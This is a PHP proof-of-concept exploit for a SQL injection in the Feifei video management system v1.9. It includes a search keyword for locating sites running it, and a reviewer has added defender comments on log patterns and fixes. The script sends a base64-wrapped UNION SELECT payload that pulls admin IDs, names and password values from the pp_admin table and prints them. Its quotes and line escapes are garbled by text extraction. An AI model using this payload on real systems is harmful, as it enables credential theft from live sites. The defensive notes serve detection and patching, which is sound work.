< ? php
/**
 * Feifei video management system (飞飞影视管理系统) SQL injection
 * Feifei video system, PHP edition v1.9 injection exploit
 * by:www.08sec.com fans
 * keyword “Powered by www.ff84.com”
 *
 * Review notes (defender view):
 * - Command-line proof of concept: it takes a host and a path argument, sends
 *   one hand-built HTTP request to port 80 of that host, and prints whatever
 *   the response contains between '@' delimiters.
 * - The injected SQL travels in the request line (the `s=vod-read-id-...`
 *   query string); the POST body is empty. The request is therefore visible
 *   in ordinary web access logs. A `vod-read-id-` value whose id is followed
 *   by anything other than digits is the pattern to alert on.
 * - Inferred root cause (the application code is not shown on this page): the
 *   id segment of the vod-read route reaches a SQL statement without integer
 *   validation or parameter binding. The fix on the application side is to
 *   validate the id as an integer and use bound parameters for the query.
 * - If the pattern appears in logs, treat the admin account names and stored
 *   password values as disclosed and rotate them.
 * - NOTE(review): quote characters and escape sequences were altered by the
 *   page's text extraction; the code below is reproduced as published.
 */

// Report fatal errors only.
error_reporting(E_ERROR);
// Remove the script execution time limit.
set_time_limit(0);

// Fewer than two command-line arguments: print the usage text and stop.
if ($argc<3) {
    print_r(‘ —————————————————— Usage: php ‘.$argv[0].’ host path host: target server (ip/hostname),without”http://” path: path to ff84cms Example: php ‘.$argv[0].’ localhost / ——————————————————- ‘);
    die;
}

$host=$argv[1];
// $path is read here but never used again; the request line below is fixed.
$path=$argv[2];
// Response buffer; sendpack() fills it through `global $html`.
$html=”;
// Only referenced by the commented-out Cookie header below.
$cookie=”";
// The value already starts with the text "User-Agent:", and the header line
// built below adds the header name again, so the request carries a doubled
// "User-Agent: User-Agent:" prefix. That is a usable log/IDS fingerprint.
$agent=” User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1″;
// Empty request body, so Content-Length below is 0.
$content =”";

// Request line. The base64 string decodes to a URL-encoded SQL fragment that
// is appended directly after the numeric id in the vod-read route: a false
// condition followed by a UNION SELECT over 29 columns, one of which
// concatenates admin_id, admin_name and admin_pwd from the pp_admin table,
// each wrapped in '@' (0x40) so the values can be found in the response.
// The payload is base64-wrapped only inside this script; on the wire and in
// server logs it appears URL-encoded, with the SQL keywords readable.
$data = “POST /?s=vod-read-id-1″.base64_decode(‘JTIwYW5kJTIwMT0yJTIwdW5pb24lMjBzZWxlY3QlMjAxLDIsMyw0LDUsNiw3LDgsOSwxMCwxMSwxMiwxMywxNCwxNSwxNiwxNywxOCwxOSwyMCwyMSwyMiwyMywyNCwyNSwyNixjb25jYXQoMHg0MCxhZG1pbl9pZCwweDQwLGFkbWluX25hbWUsMHg0MCxhZG1pbl9wd2QsMHg0MCksMjgsMjklMjBmcm9tJTIwcHBfYWRtaW4tLQ==’).”html HTTP/1.1rn”;
$data .= “Host: “.$host.”rn”;
//$data .=”Cookie: “.$cookie.”rn”;
$data .= “User-Agent: “.$agent. “rn”;
$data .= “Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn”;
$data .= “Accept-Language: zh-cn,zh;q=0.5rn”;
$data .= “Accept-Encoding: gzip,deflatern”;
$data .= “Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7rn”;
$data .= “Connection: keep-alivern”;
$data .= “Content-Type: application/x-www-form-urlencodedrn”;
$data .= “Content-Length: “.strlen($content).”rnrn”;
$data .= $content.”rn”;

// Send the request; the raw response is stored in the global $html.
Sendpack($data);

// A response without the text "Tpl" (case-insensitive) is treated as failure.
// NOTE(review): what "Tpl" marks in the application's output is not shown here.
if (!eregi(“Tpl”,$html)){
    // echo $packet.”rn”;
    // echo $html.”rn”;
    die(“Exploit failed…”);
}else{
    // Greedy match: captures everything between the first and the last '@'
    // in the response, i.e. the delimited admin id, name and password value.
    $pattern=”/@(.*)@/i”;
    preg_match($pattern,$html,$pg);
    echo “$pg[1]rnrn”;
    echo “rnExploit succeeded…rn”;
}

/**
 * Sends a raw HTTP request to the target host and stores the raw response.
 *
 * Resolves the global $host with gethostbyname(), opens a TCP connection to
 * port 80 (plain HTTP, no TLS), writes $packet, then reads until end of
 * stream into the global $html. Prints a message and exits when the
 * connection cannot be opened.
 *
 * @param string $packet Complete HTTP request text, as built by the caller.
 */
Function sendpack ($packet) {
    global $host, $html;
    $ock=fsockopen(gethostbyname($host),’80′);
    if (!$ock) {
        echo ‘No response from ‘.$host;
        die;
    }
    fputs($ock,$packet);
    // Clear the buffer, then append the response line by line.
    $html=”;
    while (!feof($ock)) {
        $html.=fgets($ock);
    }
    fclose($ock);
}